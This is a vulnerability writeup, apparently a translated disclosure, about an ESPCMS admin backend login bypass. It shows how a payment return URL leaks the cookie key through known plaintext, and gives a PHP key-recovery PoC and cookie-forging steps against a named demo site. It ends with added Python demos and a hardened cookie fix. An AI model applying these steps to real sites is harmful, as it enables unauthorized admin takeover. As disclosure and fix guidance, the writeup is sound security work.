ESPCMS latest version: admin backend login bypass (demo test)
This case again turns on the encryption/decryption function, but it differs from the previous one.
Look at the encryption/decryption function:
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {
    $result = null;
    if ($operation == 'ENCODE') {
        if (extension_loaded('mcrypt') && $mcrype) {
            $result = $this->encryptCookie($string, $key);
        } else {
            for ($i = 0; $i < strlen($string); $i++) {
                $char = substr($string, $i, 1);
                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                $char = chr(ord($char) + ord($keychar));
                $result .= $char;
            }
            $result = base64_encode($result);
            $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
        }
    } elseif ($operation == 'DECODE') {
        if (extension_loaded('mcrypt') && $mcrype) {
            $result = $this->decryptCookie($string, $key);
        } else {
            $data = str_replace(array('-', '_'), array('+', '/'), $string);
            $mod4 = strlen($data) % 4;
            if ($mod4) {
                $data .= substr('====', $mod4);
            }
            $string = base64_decode($data);
            for ($i = 0; $i < strlen($string); $i++) {
                $char = substr($string, $i, 1);
                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                $char = chr(ord($char) - ord($keychar));
                $result .= $char;
            }
        }
    }
    return $result;
}
It has one more statement than before:
if (extension_loaded('mcrypt') && $mcrype) {
    $result = $this->encryptCookie($string, $key);
}
If the mcrypt extension is loaded and $mcrype is true, encryptCookie is called to do the encryption.
encryptCookie:
function encryptCookie($value, $key = '@LFK24s224%@safS3s%1f%') {
    if (!$value) {
        return false;
    }
    $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
    $crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, md5($key), $value, MCRYPT_MODE_ECB, $iv);
    return trim(base64_encode($crypttext));
}
That is PHP's built-in mcrypt cipher .. no way past that one.
When the cookies for members and backend users are encrypted, $mcrype is left at its default of true, so the previous method does not work.
However, in /interface/ordermain.php there is an encryption call with $mcrype set to false:
function in_read() {
    ............
    $payobj = new $plugcode();
    $codesn = $this->fun->eccode($plugcode . $read['ordersn'] . $oid, 'ENCODE', db_pscode, FALSE);
    $respondArray = array('code' => $plugcode, 'ordersn' => $read['ordersn'], 'oid' => $oid, 'codesn' => $codesn);
    $return_url = $this->get_link('paybackurl', $respondArray, admin_LNG, 0, 1);
    ..........
We can use the previous method to recover the key from this codesn, since its plaintext (code, ordersn and oid) is sent alongside it in the same URL.
The admin permission check in the backend is as follows:
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)
Encrypt the following with the recovered key:
1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)
This value can be used to log in to the backend. (The password can be anything; just make sure admin_AGENT and admin_ClassURL are correct.)
-----------------------------------------------------------------------------------
First register a user, buy a product, and open the order view page.
Inspect the page elements:
return_url=http://demo.ecisp.cn/html/cn/index.php?ac=respond&at=payok&codesn=ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw&code=alipay&ordersn=ESP-201502240614511702&oid=198
The return_url is what we need.
Enter the PoC:
$text = "alipay" . "ESP-201502240614511702" . "198"; // code . ordersn . oid, the values taken from the return_url obtained above
$cookie = "ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw"; // codesn
$bincookie = base64_decode($cookie);
for ($j = 0; $j < strlen($text); $j++) {
    // ciphertext byte minus plaintext byte gives the key byte used at that position
    echo chr(ord($bincookie[$j]) - ord($text[$j]));
}
The output:
5b16dd028ac5b2eabab6125A6A88B****
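To make the weakness concrete, here is a Python re-implementation of the mcrypt-less branch of eccode together with the subtraction the PoC above performs. It is an added example, not code from ESPCMS or from this writeup: SAMPLE_KEY is a constructed 32-character value standing in for db_pscode, and SAMPLE_PLAIN is code . ordersn . oid from the return_url above. One detail the code makes visible: because the key index is ($i % strlen($key)) - 1, PHP serves the last key byte at position 0, so the bytes recovered by subtraction are the key rotated by one position; keystream_to_key undoes that.

```python
import base64

# Constructed sample key: 32 hex-like characters, the shape of an md5-based db_pscode.
# This is NOT the real ESPCMS key.
SAMPLE_KEY = b"0123456789abcdef0123456789ABCDEF"
# Plaintext that ordermain.php encodes: $plugcode . $read['ordersn'] . $oid,
# built from the values visible in the return_url above.
SAMPLE_PLAIN = b"alipay" + b"ESP-201502240614511702" + b"198"


def keystream_byte(key: bytes, i: int) -> int:
    """Key byte that eccode adds at position i.

    PHP's substr($key, ($i % strlen($key)) - 1, 1) yields index -1 whenever i is
    a multiple of the key length, and PHP reads -1 as the last byte, so the
    byte used at position i is key[(i - 1) mod len(key)].
    """
    return key[(i - 1) % len(key)]


def _b64url_decode(token: str) -> bytes:
    data = token.replace("-", "+").replace("_", "/")
    if len(data) % 4:
        data += "=" * (4 - len(data) % 4)  # same effect as substr('====', $mod4)
    return base64.b64decode(data)


def eccode_encode(plain: bytes, key: bytes) -> str:
    """Fallback branch of eccode(..., 'ENCODE', ..., false): byte-wise addition mod 256."""
    out = bytes((c + keystream_byte(key, i)) & 0xFF for i, c in enumerate(plain))
    token = base64.b64encode(out).decode()
    return token.replace("+", "-").replace("/", "_").replace("=", "")


def eccode_decode(token: str, key: bytes) -> bytes:
    """Fallback branch of eccode(..., 'DECODE', ..., false)."""
    raw = _b64url_decode(token)
    return bytes((c - keystream_byte(key, i)) & 0xFF for i, c in enumerate(raw))


def recover_keystream(token: str, known_plain: bytes) -> bytes:
    """Known-plaintext recovery, the same arithmetic as the PHP PoC:
    ciphertext byte minus plaintext byte is the key byte for that position."""
    raw = _b64url_decode(token)
    return bytes((c - p) & 0xFF for c, p in zip(raw, known_plain))


def keystream_to_key(stream: bytes, keylen: int) -> bytes:
    """Undo the one-position rotation caused by the '- 1' in the index.
    Key positions not covered by the known plaintext are left as '?'."""
    key = bytearray(b"?" * keylen)
    for i, b in enumerate(stream):
        key[(i - 1) % keylen] = b
    return bytes(key)


if __name__ == "__main__":
    token = eccode_encode(SAMPLE_PLAIN, SAMPLE_KEY)
    stream = recover_keystream(token, SAMPLE_PLAIN)
    print("token     :", token)
    print("keystream :", stream)
    print("key       :", keystream_to_key(stream, len(SAMPLE_KEY)))
```

With 31 bytes of known plaintext against a 32-byte key, exactly one key position stays unknown; every other byte falls out of a single subtraction, which is why a constant key with this scheme offers no protection once any encoded value is seen next to its plaintext.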
Encrypt that value with encryptCookie using the recovered key,
modify the ecisp_admininfo cookie,
and you can log in to the backend.
Solution:
I don't understand why FALSE is needed there .. It is best to also check the password when validating the login. Don't trust data sent by the user too much.
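For the fix the author suggests, here is an added example (Python, not ESPCMS code and not part of the original writeup) of an admin cookie that is never trusted on its own: the payload is authenticated with an HMAC under a server-side secret, compared in constant time, and bound to the stored password hash so the cookie stops working when the password changes. SERVER_SECRET and the USERS table are constructed for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets

# Constructed server-side secret; in a real deployment this lives only in server config.
SERVER_SECRET = b"constructed-server-secret-not-for-production"

# Constructed user table standing in for the admin user store.
USERS = {
    1: {"username": "admin", "pwhash": hashlib.sha256(b"constructed-password").hexdigest(), "is_admin": True},
    2: {"username": "editor", "pwhash": hashlib.sha256(b"another-password").hexdigest(), "is_admin": False},
}


def _b64u(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64u(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _pw_binding(pwhash: str) -> str:
    # Derived from the stored password hash, so changing the password invalidates
    # every token issued before the change; the hash itself never leaves the server.
    return hmac.new(SERVER_SECRET, pwhash.encode(), hashlib.sha256).hexdigest()[:16]


def issue_token(uid: int) -> str:
    """Build payload.tag for a user who has just authenticated with a password."""
    user = USERS[uid]
    payload = json.dumps(
        {"uid": uid, "pwb": _pw_binding(user["pwhash"]), "nonce": secrets.token_hex(8)},
        separators=(",", ":"),
    ).encode()
    tag = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    return _b64u(payload) + "." + _b64u(tag)


def authorize_admin(token: str):
    """Return the user record if the token is authentic and the user is still an admin, else None."""
    try:
        p, t = token.split(".", 1)
        payload, tag = _unb64u(p), _unb64u(t)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # tampered or forged: reject before reading any field
    claims = json.loads(payload)
    user = USERS.get(claims.get("uid"))
    if user is None or not user["is_admin"]:
        return None  # role comes from the server-side record, not the cookie
    if not hmac.compare_digest(claims.get("pwb", ""), _pw_binding(user["pwhash"])):
        return None  # password changed since the token was issued
    return user


def tamper(token: str, **changes) -> str:
    """Rewrite payload fields but keep the old tag, which is all a forger without the secret can do."""
    p, t = token.split(".", 1)
    claims = json.loads(_unb64u(p))
    claims.update(changes)
    return _b64u(json.dumps(claims, separators=(",", ":")).encode()) + "." + t


if __name__ == "__main__":
    tok = issue_token(1)
    print("genuine admin token accepted:", authorize_admin(tok) is not None)
    print("uid rewritten to 2, old tag kept:", authorize_admin(tamper(tok, uid=2)))
    print("non-admin user's own token:", authorize_admin(issue_token(2)))
```

Contrast this with the original check, which accepts any cookie that decrypts to the right shape: here the server secret never appears in anything the client can see, so a known plaintext gives an attacker nothing, and the admin role and password state are re-read from the server on every request.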